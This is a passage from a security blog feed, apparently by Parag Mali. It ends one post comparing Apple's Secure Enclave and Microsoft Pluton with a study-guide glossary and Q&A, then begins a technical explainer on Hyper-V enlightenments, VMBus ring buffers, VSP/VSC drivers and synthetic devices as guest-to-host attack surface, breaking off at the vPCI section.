&lt;p&gt;The closing observation worth keeping is the one Pulse Security demonstrated by accident: most hardware security failures are not failures of the math. They are failures of the physical placement and the patch flow. SEP and Pluton both close the historical bus-sniffing attack class. They both retain a slow channel for fault-injection research to chip away at. They both depend on the device owner trusting the vendor&apos;s signing infrastructure. The next big shift -- if it comes -- will probably be in &lt;em&gt;who controls the patch channel&lt;/em&gt;, not in the silicon itself.&lt;/p&gt;
&lt;p&gt;That is the bet to watch.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;apple-secure-enclave-vs-microsoft-pluton&quot; keyTerms={[
  { term: &quot;SEP&quot;, definition: &quot;Apple Secure Enclave Processor, a dedicated security coprocessor with its own CPU core, sepOS, and mailbox API.&quot; },
  { term: &quot;sepOS&quot;, definition: &quot;Apple&apos;s L4-microkernel-derived OS running inside the SEP.&quot; },
  { term: &quot;MPE&quot;, definition: &quot;Memory Protection Engine: encrypts and authenticates SEP-bound DRAM cache lines with anti-replay protection.&quot; },
  { term: &quot;SSC&quot;, definition: &quot;Secure Storage Component: external tamper-resistant chip storing monotonic counters used by the SEP for anti-hammering, present from A13 onward.&quot; },
  { term: &quot;Pluton&quot;, definition: &quot;Microsoft&apos;s on-die security subsystem present on supported AMD, Intel, and Qualcomm SoCs; presents a TPM 2.0 personality and accepts firmware updates via Windows Update and UEFI capsule.&quot; },
  { term: &quot;SHACK&quot;, definition: &quot;Microsoft&apos;s name for keys that never leave the protected hardware, even to the Pluton firmware itself.&quot; },
  { term: &quot;TPM 2.0&quot;, definition: &quot;Trusted Computing Group&apos;s standard cryptoprocessor spec, defining PCRs, EK, AK, sealing, and the TPM2_Quote attestation primitive.&quot; },
  { term: &quot;Direct Anonymous Attestation (DAA)&quot;, definition: &quot;Group-signature scheme letting a device prove membership in a class of legitimate devices without revealing which one. ECDAA is the elliptic-curve variant standardized in TPM 2.0.&quot; },
  { term: &quot;App Attest&quot;, definition: &quot;Apple&apos;s per-installation SEP-rooted attestation service; produces a key chained to Apple&apos;s CA proving the running app is genuine on a genuine Apple device.&quot; },
  { term: &quot;checkm8&quot;, definition: &quot;CVE-2019-8900: unpatchable boot-ROM use-after-free affecting A5-A11 Apple SoCs and the T2 chip; gives AP code execution at boot to physical attackers.&quot; },
  { term: &quot;faulTPM&quot;, definition: &quot;USENIX WOOT 2023 voltage-fault-injection attack against AMD&apos;s PSP, extracting fTPM key derivation seed and recovering BitLocker VMK on a Lenovo Ideapad.&quot; },
  { term: &quot;WebAuthn&quot;, definition: &quot;W3C JavaScript API for hardware-backed credentials, implemented over CTAP, that hides SEP-vs-TPM differences from web developers.&quot; }
]} questions={[
  { q: &quot;Why was the Pulse Security TPM-sniffing attack possible on a Surface Pro 3 despite the TPM working correctly?&quot;, a: &quot;The TPM correctly unsealed and returned the BitLocker VMK over the LPC bus on the motherboard; the attacker could read it because the bus is physically exposed. Pluton eliminates this attack class by living on the SoC die.&quot; },
  { q: &quot;Why does Apple ship the SEP as a separate physical core rather than as an enclave inside the application CPU?&quot;, a: &quot;A separate core eliminates the microarchitectural-side-channel and co-execution attack classes (Meltdown/Spectre/Hertzbleed family) that destroyed Intel SGX. The SEP simply does not share execution resources with potentially hostile code on the application cores.&quot; },
  { q: &quot;What does Pluton&apos;s firmware update model buy that discrete TPMs do not?&quot;, a: &quot;In-field patchability via Windows Update and UEFI capsule, signed by Microsoft. Discrete TPM updates require an OEM utility most users never run, so serious TPM firmware bugs remain unpatched on most deployed devices.&quot; },
  { q: &quot;How does App Attest&apos;s privacy property differ from TPM 2.0 ECDAA?&quot;, a: &quot;App Attest is per-installation: each install of each app gets a unique key chained to Apple&apos;s CA. ECDAA is a group signature: a device proves it belongs to a set of legitimate devices without revealing which one. Different threat models against different correlation adversaries.&quot; },
  { q: &quot;What does faulTPM tell us about the security of Pluton-on-AMD?&quot;, a: &quot;It tells us the underlying AMD PSP TEE that Pluton-on-AMD rides on is fault-attackable. Whether Pluton&apos;s additional hardening blocks the fault-injection class is open; no Pluton-specific extraction attack is publicly disclosed as of May 2026 in the verified sources.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>hardware-security</category><category>secure-enclave</category><category>pluton</category><category>tpm</category><category>root-of-trust</category><category>attestation</category><category>platform-security</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Hyper-V Enlightenments, VMBus, and the Synthetic Device Model</title><link>https://paragmali.com/blog/hyper-v-enlightenments-vmbus-and-the-synthetic-device-model/</link><guid isPermaLink="true">https://paragmali.com/blog/hyper-v-enlightenments-vmbus-and-the-synthetic-device-model/</guid><description>How Hyper-V guests get high-performance device I/O without emulating legacy hardware: enlightenments, the TLFS, VMBus rings, the VSP/VSC pair, and why the host-side parser is the attack surface.</description><pubDate>Thu, 14 May 2026 00:00:00 GMT</pubDate><content:encoded>
Hyper-V&apos;s guest OSes do not see emulated 1990s hardware. They see a published, versioned hypervisor ABI called the **Top-Level Functional Specification**, a transport called **VMBus** that consists of two ring buffers per channel, and a catalogue of synthetic devices whose backends live in the privileged root partition. This design is what makes Windows and Linux equally fast inside Hyper-V, and it is also why the host-side parsers in `vmswitch.sys` keep producing critical CVEs. The 2024 OpenHCL paravisor moves those parsers into the guest&apos;s own trust boundary in memory-safe Rust, which is the most consequential change to the Hyper-V device model since 2008.
&lt;h2&gt;1. The Type-1 hypervisor foundation&lt;/h2&gt;
&lt;p&gt;Open &lt;code&gt;Task Manager&lt;/code&gt; on a modern Windows 11 desktop, switch to the &lt;code&gt;Performance&lt;/code&gt; tab, and look at the line that says &quot;Virtualization: Enabled.&quot; That single line hides one of the most consequential design choices in modern operating systems: when Microsoft shipped Hyper-V with Windows Server 2008 in June 2008 [@ms-hyperv-server-overview], they did not bolt a virtualization product on top of Windows. They put a small hypervisor &lt;em&gt;underneath&lt;/em&gt; it.&lt;/p&gt;
&lt;p&gt;That ordering matters more than it sounds. In the older Microsoft Virtual Server 2005 model, Windows ran on the bare metal and a user-mode service emulated PC hardware for guests inside it. In the Hyper-V architecture documented by Microsoft in 2008 [@ms-hyperv-architecture], the hypervisor boots first and Windows itself becomes a guest of the hypervisor. Microsoft calls this guest the &lt;strong&gt;root partition&lt;/strong&gt;. Every other VM on the box is a &lt;strong&gt;child partition&lt;/strong&gt;.&lt;/p&gt;

A hypervisor that runs directly on the physical hardware rather than inside a host operating system. Hyper-V, VMware ESXi, and Xen are Type-1; VirtualBox and the original Microsoft Virtual Server are Type-2 (hosted). In a Type-1 design no general-purpose OS sits between the hypervisor and the silicon, which lets the hypervisor enforce isolation directly using CPU virtualization extensions like Intel VT-x and AMD-V.
&lt;p&gt;The root partition is not just another VM. It is a privileged partition: it owns the physical I/O devices, runs the parent stack of synthetic-device backends, and brokers everything that touches real hardware. Children get virtual processors and a slice of memory, and they communicate with the root over a software bus called VMBus that we will spend most of this article taking apart.&lt;/p&gt;

flowchart TD
    HW[&quot;Physical hardware (CPU, RAM, NICs, NVMe)&quot;]
    HV[&quot;Hyper-V hypervisor (microkernel)&quot;]
    Root[&quot;Root partition (Windows Server)&quot;]
    VSP[&quot;Virtualization Service Providers (VSPs): vmswitch.sys, storvsp.sys, ...&quot;]
    C1[&quot;Child partition: Windows VM&quot;]
    C2[&quot;Child partition: Linux VM&quot;]
    VSC1[&quot;VSCs: netvsc, storvsc, ...&quot;]
    VSC2[&quot;VSCs: hv_netvsc, hv_storvsc, ...&quot;]
    HW --&amp;gt; HV
    HV --&amp;gt; Root
    HV --&amp;gt; C1
    HV --&amp;gt; C2
    Root --&amp;gt; VSP
    VSP -. &quot;VMBus channel&quot; .-&amp;gt; VSC1
    VSP -. &quot;VMBus channel&quot; .-&amp;gt; VSC2
    C1 --&amp;gt; VSC1
    C2 --&amp;gt; VSC2
&lt;p&gt;The hypervisor itself is small by design. The Hyper-V architecture page on Microsoft Learn [@ms-hyperv-architecture-perf] describes it as a microkernel: it does the minimum a hypervisor must do (CPU scheduling, memory partitioning, interrupt routing, an inter-partition message bus) and pushes everything else, including the device models, out to the root partition. This is the opposite of the early VMware ESX design, where the hypervisor itself contained large device drivers.The microkernel choice was pragmatic, not ideological. A monolithic hypervisor with built-in NIC and storage drivers would have been a catastrophic certification problem: every NIC firmware update would risk a hypervisor patch. By delegating I/O to the Windows root partition, Microsoft re-used the entire Windows driver stack.&lt;/p&gt;
&lt;p&gt;The split also explains why Hyper-V &quot;feels Windows-shaped&quot; even though it is technically not Windows. The root partition is Windows, with all of its drivers, its WMI, its event log, its &lt;code&gt;Get-VM&lt;/code&gt; PowerShell cmdlets. The hypervisor underneath is a small, separate binary (&lt;code&gt;hvix64.exe&lt;/code&gt; on Intel, &lt;code&gt;hvax64.exe&lt;/code&gt; on AMD) that you almost never have a reason to think about. Microsoft itself goes further: in the same architecture document, it stresses that all device-model traffic flows through the root: &quot;the management operating system hosts virtual service providers (VSPs) that communicate over the VMBus to handle device access requests from child partitions&quot; (Microsoft Learn: Overview of Hyper-V [@ms-overview-hyper-v]).&lt;/p&gt;
&lt;p&gt;This sets up the question the rest of the article answers: if the hypervisor is small, the guest is unmodified Windows or Linux, and the root partition owns the real devices, then how does a guest actually do disk and network I/O at gigabit-or-better speeds without paying enormous costs to traverse all of these boundaries?&lt;/p&gt;
&lt;p&gt;The short answer is in three pieces: &lt;strong&gt;enlightenments&lt;/strong&gt; (the guest knows it is virtualized and uses hypercalls), &lt;strong&gt;VMBus&lt;/strong&gt; (the inter-partition transport), and the &lt;strong&gt;VSP/VSC pair&lt;/strong&gt; (split drivers that share memory through VMBus rings). The next section starts with the first of those three.&lt;/p&gt;
&lt;h2&gt;2. Enlightenments: what &quot;knowing you are virtualized&quot; buys you&lt;/h2&gt;
&lt;p&gt;In the early 2000s, the dominant intuition was that a hypervisor&apos;s job is to fool the guest. A perfectly faithful emulation of an Intel 440BX motherboard, a DEC 21140 NIC, and an IDE controller is what made VMware Workstation a useful product in 1999. It is also what made Microsoft Virtual Server 2005 too slow to saturate gigabit links: every &lt;code&gt;out&lt;/code&gt; instruction on a fake NIC port trapped to the hypervisor, was decoded against an in-memory chip model, and produced a synthetic interrupt that itself trapped on the way out. The Microsoft Virtual Server retrospective on Wikipedia [@wikipedia-virtual-server] notes that the architecture had no paravirtualization support and that performance was constrained relative to later hardware-assisted designs.&lt;/p&gt;
&lt;p&gt;Hyper-V&apos;s answer was to drop the pretence. If the guest &lt;em&gt;knows&lt;/em&gt; it is in a VM, it can use a fast path designed for VMs instead of pretending to drive imaginary chips. Microsoft calls this knowledge an &lt;strong&gt;enlightenment&lt;/strong&gt;, and the Hyper-V feature discovery page [@ms-tlfs-feature-discovery] is the contract a guest uses to learn what enlightenments the hypervisor offers.&lt;/p&gt;

A modification or feature in a guest operating system that takes advantage of running under a specific hypervisor. An enlightened guest detects the hypervisor (on x86, by reading the `cpuid` leaves at `0x40000000` and above), then opts in to using paravirtual interfaces (hypercalls, synthetic timers, synthetic interrupt controllers, shared TSC pages) instead of trapping on emulated hardware. An unmodified guest would still boot, but slower.
&lt;p&gt;Detection is the cheap part. The Linux kernel&apos;s Hyper-V overview document [@kernel-hyperv-overview] describes four cooperating mechanisms, layered atop one another: implicit traps that the hypervisor handles transparently, &lt;strong&gt;explicit hypercalls&lt;/strong&gt; the guest issues on purpose, &lt;strong&gt;synthetic registers&lt;/strong&gt; exposed as model-specific registers (MSRs) in the architectural CPU register file, and &lt;strong&gt;VMBus&lt;/strong&gt; for high-bandwidth device traffic. Each layer builds on the one below it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The contract between Hyper-V and its guests is &lt;em&gt;published&lt;/em&gt;. Microsoft maintains the &lt;strong&gt;Top-Level Functional Specification&lt;/strong&gt; as a public document under the Open Specification Promise. That single decision is why Linux ships an in-tree Hyper-V driver stack and why VMBus is not a black box.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The hypercall page&lt;/h3&gt;
&lt;p&gt;The first thing an enlightened guest does is set up a hypercall page. The TLFS Hypercall Interface page [@ms-tlfs-hypercall] describes the dance: the guest writes its identity into &lt;code&gt;HV_X64_MSR_GUEST_OS_ID&lt;/code&gt; (MSR &lt;code&gt;0x40000000&lt;/code&gt;), then writes a guest-physical address and an &lt;code&gt;enable&lt;/code&gt; bit into &lt;code&gt;HV_X64_MSR_HYPERCALL&lt;/code&gt; (MSR &lt;code&gt;0x40000001&lt;/code&gt;). The hypervisor responds by populating that page with the right opcode for the current CPU: &lt;code&gt;vmcall&lt;/code&gt; on Intel, &lt;code&gt;vmmcall&lt;/code&gt; on AMD. From that moment on, &quot;make a hypercall&quot; is a normal &lt;code&gt;call&lt;/code&gt; into a known address rather than an opcode the kernel must hand-assemble per CPU vendor.This trick neatly externalises the vendor-specific calling convention. Microsoft can later swap to a new opcode (say, on ARM64, where the equivalent is an &lt;code&gt;HVC&lt;/code&gt; instruction) without any guest code change. The guest just learns the new page contents.&lt;/p&gt;
&lt;p&gt;The same TLFS page documents two hypercall classes: &lt;strong&gt;simple&lt;/strong&gt; hypercalls (one operation, returns or faults) and &lt;strong&gt;rep&lt;/strong&gt; (repeated) hypercalls that take a counter and a start index, so a long-running operation can yield mid-flight without losing work. Three calling conventions exist: a memory-based one for large parameter blocks, a register-only fast variant for the very common case of one or two inputs, and an XMM-register variant that lets a guest pass up to 112 bytes of input through SSE registers.&lt;/p&gt;
&lt;p&gt;That XMM variant is unusual enough to flag. Most kernel ABIs do not touch SSE in privileged code because saving and restoring the full SSE state is expensive. Hyper-V&apos;s hypercall ABI uses XMM precisely because the round-trip cost of a hypercall is dominated by the &lt;code&gt;VMEXIT&lt;/code&gt; itself, so squeezing a few more bytes into registers is cheaper than spilling them to memory and reading them back.&lt;/p&gt;
&lt;h3&gt;Synthetic interrupts and synthetic timers&lt;/h3&gt;
&lt;p&gt;A guest&apos;s virtual processor has its own emulated local APIC by default, but an enlightened guest can also use a &lt;strong&gt;Synthetic Interrupt Controller (SynIC)&lt;/strong&gt;, defined in the TLFS. Each virtual processor gets 16 SINT slots, a per-CPU shared message page, and a per-CPU shared event page. SINTs are how VMBus signals events to the guest without going through the legacy LAPIC fast path.&lt;/p&gt;

One of 16 logical interrupt sources per virtual processor that the Hyper-V Synthetic Interrupt Controller can signal. SINTs are reachable through MSRs (`HV_X64_MSR_SINT0` through `HV_X64_MSR_SINT15`) and back the doorbell mechanism for VMBus channels and for synthetic timers. They are paravirtual: they would not exist on a bare-metal CPU.
&lt;p&gt;The clock side is even more interesting. The Linux kernel Hyper-V clocks documentation [@kernel-clocks] describes a &lt;strong&gt;reference TSC page&lt;/strong&gt; that the hypervisor maintains in shared memory: it contains a scale factor and an offset such that&lt;/p&gt;
&lt;p&gt;$$
\text{guest_time} = (\text{TSC} \times \text{scale}) &amp;gt;&amp;gt; 64 + \text{offset}
$$&lt;/p&gt;
&lt;p&gt;ticks at a constant 10 MHz frequency regardless of the underlying TSC. The guest&apos;s &lt;code&gt;clock_gettime&lt;/code&gt; and &lt;code&gt;gettimeofday&lt;/code&gt; can read TSC, multiply, shift, add, and return, all in user space via vDSO, with no kernel transition and no hypercall.&lt;/p&gt;

A web server that calls `clock_gettime` once per request, on a million-requests-per-second box, is a ridiculous workload that real systems run constantly. Without enlightenments, every call would be a `rdmsr` on a virtualised TSC or a trap into the hypervisor. With the reference TSC page, the same call is four arithmetic ops and a memory load. The kernel doc explains that this scale and offset survive live migration: &quot;in the case of a live migration to a host with a different TSC frequency, Hyper-V adjusts the scale and offset values in the shared page so that the 10 MHz frequency is maintained&quot; (Linux kernel: Hyper-V clocks [@kernel-clocks]).
&lt;p&gt;Synthetic timers complete the picture. Each virtual CPU has four synthetic timers programmable via MSRs; they fire SINTs into the SynIC. The guest does not need to touch an emulated PIT or HPET. Combined, SynIC + synthetic timers + the reference TSC page mean that an enlightened guest can do most of its time-keeping and inter-partition signalling without ever touching the legacy interrupt/timer chip surface.&lt;/p&gt;
&lt;h3&gt;The TLFS as a contract&lt;/h3&gt;
&lt;p&gt;All of this is published. The Top-Level Functional Specification [@ms-tlfs] is the document a guest author reads to know which MSRs to write, which &lt;code&gt;cpuid&lt;/code&gt; leaves to query, which hypercalls exist, and which features the hypervisor signals via feature flags. Microsoft maintains it under the Open Specification Promise. That promise is a deliberate contractual choice. Without it, Linux could not ship &lt;code&gt;drivers/hv/&lt;/code&gt; in-tree and Microsoft could not credibly claim that Linux is a first-class Hyper-V guest. The TLFS is the artefact that makes the rest of the architecture cooperative rather than reverse-engineered.&lt;/p&gt;
&lt;p&gt;The next layer up uses these primitives to build something more ambitious: a general-purpose inter-partition transport.&lt;/p&gt;
&lt;h2&gt;3. VMBus: the inter-partition transport&lt;/h2&gt;
&lt;p&gt;If enlightenments are the alphabet, VMBus is the language that synthetic devices speak. The Linux kernel VMBus document [@kernel-vmbus] puts the definition tersely: &quot;VMBus is a software construct provided by Hyper-V to guest VMs. It consists of a control path and common facilities used by synthetic devices that Hyper-V presents to guest VMs. The common facilities include software channels for communicating between the device driver in the guest VM and the synthetic device implementation that is part of Hyper-V, and signaling primitives to allow Hyper-V and the guest to interrupt each other.&quot;&lt;/p&gt;
&lt;p&gt;There is a lot in that paragraph. Let me unpack it, because this is the architectural core.&lt;/p&gt;

A software-only inter-partition communication bus provided by Hyper-V. It has a control path (channel offer, open, close, rescind), and per-device data channels built on shared memory ring buffers. VMBus is not a real bus in any hardware sense; nothing on the PCIe topology is named VMBus. It is a contract between guest drivers and the hypervisor.
&lt;h3&gt;Channels and the offer protocol&lt;/h3&gt;
&lt;p&gt;Every synthetic device a guest sees corresponds to a &lt;strong&gt;VMBus channel&lt;/strong&gt;. The root partition advertises (&lt;code&gt;OfferChannel&lt;/code&gt;) the list of devices a guest is permitted to use. The guest&apos;s VMBus driver iterates the offers, matches each to a class GUID (synthetic SCSI is one GUID, synthetic NIC is another, the input-style &lt;code&gt;vmbusrhid&lt;/code&gt; device is a third), and binds an in-kernel device driver to each one. The reverse operation, &lt;code&gt;RescindChannel&lt;/code&gt;, lets the host revoke a device cleanly, which is what happens during live migration when an SR-IOV virtual function gets pulled out from under a running VM.&lt;/p&gt;

sequenceDiagram
    participant Root as Root partition (VSP)
    participant HV as Hyper-V hypervisor
    participant Guest as Guest VM (VSC)
    Root-&amp;gt;&amp;gt;HV: OfferChannel(class_guid, instance_guid)
    HV-&amp;gt;&amp;gt;Guest: ChannelOffer message via SynIC
    Guest-&amp;gt;&amp;gt;HV: OpenChannel(ringbuf_gpa, signal_event)
    HV-&amp;gt;&amp;gt;Root: Channel opened
    loop steady-state I/O
        Guest-&amp;gt;&amp;gt;Root: write descriptor + payload to ring, signal SINT
        Root-&amp;gt;&amp;gt;Guest: write response to ring, signal SINT
    end
    Root-&amp;gt;&amp;gt;HV: RescindChannel(instance_guid)
    HV-&amp;gt;&amp;gt;Guest: ChannelRescind via SynIC
    Guest-&amp;gt;&amp;gt;Root: CloseChannel
&lt;h3&gt;Two ring buffers, one channel&lt;/h3&gt;
&lt;p&gt;Each open channel is two unidirectional ring buffers in shared memory: one for guest-to-host messages, one for host-to-guest. Each ring has a 4 KiB header page that holds the read index, the write index, and control flags, plus a power-of-two payload region. The guest tells the hypervisor which guest-physical pages back the ring through an object called a &lt;strong&gt;GPA Descriptor List&lt;/strong&gt; (GPADL), built up via the &lt;code&gt;vmbus_establish_gpadl&lt;/code&gt; API.&lt;/p&gt;
&lt;p&gt;The kernel doc reveals a small but durable engineering detail. It maps the ring buffer twice in the guest&apos;s kernel virtual address space: header page first, ring contents next, and then &lt;em&gt;the ring contents again&lt;/em&gt;, contiguously. Why? Because that lets a copy loop walk past the end of the ring without writing wrap-around code; the next byte after the ring&apos;s last byte is the ring&apos;s first byte, by virtual-memory arrangement. It is the same trick used inside the Linux page cache for &lt;code&gt;fbdev&lt;/code&gt; and inside DPDK&apos;s mempool. It costs a little address space; it saves a branch on every payload byte.The Linux kernel doc is explicit that this double-mapping convenience exists in the guest only. If you are writing a userspace tool that ingests a captured VMBus ring (for forensics or debugging) you must implement wrap-around manually. This is exactly the kind of detail that source code documentation captures and prose articles forget.&lt;/p&gt;
&lt;p&gt;The total amount of GPADL-shared memory a single guest can hold is capped per Windows version. The kernel doc records the numbers: roughly &lt;strong&gt;1280 MiB on Windows Server 2019 and later&lt;/strong&gt;, roughly &lt;strong&gt;384 MiB on earlier hosts&lt;/strong&gt; (Linux kernel: VMBus [@kernel-vmbus]). For a guest with 30+ channels (multiple netvsc subchannels, multiple storvsc subchannels, vPCI, KVP, time sync, VSS, balloon, framebuffer), that ceiling is real but not yet limiting at typical ring sizes of 1 to 16 MiB per direction.&lt;/p&gt;
&lt;h3&gt;The doorbell&lt;/h3&gt;
&lt;p&gt;Shared memory alone is not enough. The guest can write into the ring all it wants; the host will not look until it is told to. Conversely, the host can write into the ring; the guest will not check until something signals it. That signal is the doorbell, and it is implemented via the &lt;strong&gt;Synthetic Interrupt Controller&lt;/strong&gt; SINTs introduced in the previous section.&lt;/p&gt;
&lt;p&gt;When the guest enqueues a request and the host&apos;s read pointer is already chasing it (i.e., the host is still processing the last batch), the guest can suppress the doorbell entirely. Only the &lt;em&gt;first&lt;/em&gt; request after the host has caught up triggers a hypercall. This is &lt;strong&gt;interrupt coalescing in software&lt;/strong&gt;, and it is the single most important performance lever on a software data plane: the round-trip cost of a &lt;code&gt;VMEXIT&lt;/code&gt; is amortised across many packets.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This same shape, shared memory rings plus an event-channel doorbell, was the central insight of Xen&apos;s split-driver paravirtualization model in 2003 [@xen-pv-wiki]). Hyper-V&apos;s contribution was not the shape; it was packaging the shape so unmodified Windows guests could use it via in-box drivers, and publishing the protocol so unmodified Linux could too.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;VSPs and VSCs&lt;/h3&gt;
&lt;p&gt;The two endpoints of a channel have specific names. The &lt;strong&gt;Virtualization Service Provider (VSP)&lt;/strong&gt; is the kernel module in the root partition that owns the device backend. The &lt;strong&gt;Virtualization Service Client (VSC)&lt;/strong&gt; is the guest-side driver that talks to the VSP through the channel. Microsoft&apos;s own architecture page is precise: &quot;the Hyper-V-specific I/O architecture consists of virtualization service providers (VSPs) in the root partition and virtualization service clients (VSCs) in the child partition. Each service is exposed as a device over VM Bus, which acts as an I/O bus and enables high-performance communication between VMs that use mechanisms such as shared memory&quot; (Microsoft Learn: Hyper-V architecture [@ms-hyperv-architecture-perf]).&lt;/p&gt;

**VSP** (Virtualization Service Provider): a kernel module in the root partition that exposes a synthetic device backend to guests over a VMBus channel. Examples: `vmswitch.sys` (synthetic NIC), `storvsp.sys` (synthetic SCSI), the `vmbusrhid` server (synthetic input). **VSC** (Virtualization Service Client): the matching driver in the guest that consumes the channel and presents an OS-native device interface (a NIC, a SCSI controller, a keyboard) to the rest of the kernel.
&lt;p&gt;The split is symmetric in transport (both sides use the same ring) but asymmetric in trust. The VSP runs in the &lt;em&gt;most&lt;/em&gt; privileged context on the box, the root partition&apos;s kernel. The VSC runs in a normal guest kernel. Every byte that flows from guest to host crosses a trust boundary and gets parsed by code with full system privilege. The next two sections will return to this fact at length, because it is where the security story lives.&lt;/p&gt;
&lt;h3&gt;Why this works for closed-source guests&lt;/h3&gt;
&lt;p&gt;The Xen project tried something similar in 2003 with &lt;code&gt;netfront&lt;/code&gt;/&lt;code&gt;blkfront&lt;/code&gt; rings and event channels, but Xen PV required a paravirtualised guest kernel: the guest had to know it was running on Xen at compile time. Closed-source guests like Windows could not be modified, so Xen&apos;s wiki [@xen-pv-wiki]) eventually documents PV-on-HVM as a workaround.&lt;/p&gt;
&lt;p&gt;Hyper-V finessed this with hardware virtualization. The guest kernel runs unmodified inside VT-x or AMD-V; CPU-level privilege separation handles the privileged instructions. The only thing the guest needs to do to opt into VMBus is &lt;em&gt;load a driver&lt;/em&gt;. Every supported Windows version since Windows 7 / Server 2008 R2 ships those drivers in-box. Linux ships them in-tree from kernel 2.6.32 onward. There is no separate &quot;install paravirt drivers&quot; step, which is why Hyper-V &quot;just works&quot; for almost any guest you point at it.&lt;/p&gt;
&lt;p&gt;The transport is settled. What rides on it is a catalogue.&lt;/p&gt;
&lt;h2&gt;4. Synthetic device classes: storage, network, input, video, vPCI&lt;/h2&gt;
&lt;p&gt;A modern Hyper-V guest, on first boot, sees a small zoo of devices that have nothing to do with PC hardware. There is no IDE controller, no PS/2 keyboard, no Cirrus VGA. There is a synthetic SCSI controller, a synthetic NIC, a synthetic keyboard and mouse, a synthetic framebuffer, and (often) a synthetic PCI passthrough channel. Each is a VSP/VSC pair on top of VMBus.&lt;/p&gt;
&lt;p&gt;The Linux kernel VMBus document [@kernel-vmbus] enumerates the catalogue: synthetic SCSI controller (&lt;code&gt;storvsc&lt;/code&gt;), synthetic NIC (&lt;code&gt;netvsc&lt;/code&gt;), synthetic framebuffer (&lt;code&gt;synthvid&lt;/code&gt;), synthetic keyboard, synthetic mouse, PCI passthrough, plus the non-device services: heartbeat, time sync, shutdown, memory balloon, KVP exchange, and online backup (VSS).&lt;/p&gt;

flowchart LR
    subgraph Guest
        nv[&quot;netvsc (NIC)&quot;]
        st[&quot;storvsc (SCSI)&quot;]
        sv[&quot;synthvid (framebuffer)&quot;]
        kb[&quot;hyperv-keyboard&quot;]
        ms[&quot;hyperv-mouse&quot;]
        pc[&quot;pci-hyperv (vPCI)&quot;]
        kvp[&quot;hv_kvp (KVP)&quot;]
        ts[&quot;hv_utils (timesync, shutdown, heartbeat)&quot;]
    end
    subgraph Root
        vsw[&quot;vmswitch.sys&quot;]
        sto[&quot;storvsp.sys&quot;]
        sfb[&quot;synthvid VSP&quot;]
        rhid[&quot;vmbusrhid VSP&quot;]
        vpci[&quot;vPCI VSP&quot;]
        kvpd[&quot;KVP daemon&quot;]
        tsd[&quot;IS daemons&quot;]
    end
    nv -- &quot;VMBus channel&quot; --- vsw
    st -- &quot;VMBus channel(s)&quot; --- sto
    sv -- &quot;VMBus channel&quot; --- sfb
    kb -- &quot;VMBus channel&quot; --- rhid
    ms -- &quot;VMBus channel&quot; --- rhid
    pc -- &quot;VMBus channel&quot; --- vpci
    kvp -- &quot;VMBus channel&quot; --- kvpd
    ts -- &quot;VMBus channel&quot; --- tsd
&lt;h3&gt;Synthetic SCSI: storvsc&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;storvsc&lt;/code&gt; VSC presents itself to the guest as a SCSI host bus adapter. Disks attached to the VM appear as SCSI LUNs hanging off that HBA. The wire protocol uses ring buffers carrying SRB (SCSI Request Block) style commands. To scale, storvsc can open multiple &lt;strong&gt;sub-channels&lt;/strong&gt;, one per host CPU, so that I/O completion interrupts and request submission spread across cores rather than serialising on a single VMBus channel.&lt;/p&gt;
&lt;p&gt;This is also why Hyper-V&apos;s &quot;Generation 2&quot; VMs work. A Generation 2 VM [@ms-gen1-gen2-vms], introduced in Windows Server 2012 R2 in 2013, has no IDE controller in the boot path at all. UEFI loads the OS loader from a synthetic SCSI device, the OS loader hands off to the kernel, and the kernel binds storvsc to the same device. The legacy IDE emulator simply never runs. That removes a lot of attack surface and lets boot volumes grow up to 64 TB on VHDX.&lt;/p&gt;
&lt;h3&gt;Synthetic NIC: netvsc&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;netvsc&lt;/code&gt; is the synthetic NIC. The wire protocol historically wrapped Microsoft&apos;s NDIS-style RNDIS frames around payloads sent through the channel ring, which is why some Linux discussions mention &quot;RNDIS frames over VMBus.&quot; The Linux driver lives in &lt;code&gt;drivers/net/hyperv/&lt;/code&gt; and the kernel netvsc documentation [@kernel-netvsc] describes how it can spread receive-side traffic across multiple VMBus subchannels via Receive Side Scaling.&lt;/p&gt;
&lt;p&gt;netvsc is also the one device class where Hyper-V composes with hardware passthrough. Section 8 will take this apart in detail; for now, note that the same &lt;code&gt;netvsc&lt;/code&gt; VSC can run alongside an SR-IOV virtual function in the guest, with &lt;code&gt;netvsc&lt;/code&gt; acting as the slow-path failover and the VF carrying the steady-state traffic.&lt;/p&gt;
&lt;h3&gt;Synthetic input: vmbusrhid&lt;/h3&gt;
&lt;p&gt;The synthetic keyboard, the synthetic mouse, and a few related input streams ride on a server in the root partition called &lt;code&gt;vmbusrhid&lt;/code&gt; (the name is shorthand for &quot;VMBus relay HID&quot;). It is a small surface in bytes, but architecturally it has the same shape as netvsc: guest-controllable messages parsed in kernel mode in the root partition. Anyone evaluating the trust boundary should treat it the same way as netvsc, even though the data rate is six orders of magnitude lower.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A path that carries 100 keystrokes per second is, on the wire, almost free. As an attack surface, it is identical to a path that carries a million packets per second: both are guest-controlled bytes parsed by privileged code. Section 7 walks through why the security community treats &lt;code&gt;vmbusrhid&lt;/code&gt; the way it treats &lt;code&gt;vmswitch.sys&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Synthetic video: synthvid&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;synthvid&lt;/code&gt; is a synthetic framebuffer. It is what lets you connect to a Hyper-V VM through the Virtual Machine Connection client without dragging in an emulated VGA. It is intentionally simple: there is no 3D acceleration in the synthetic path. Workloads that need GPU acceleration use a different mechanism, vPCI / DDA, to assign a real GPU to the VM.&lt;/p&gt;
&lt;h3&gt;vPCI: synthetic PCI passthrough&lt;/h3&gt;
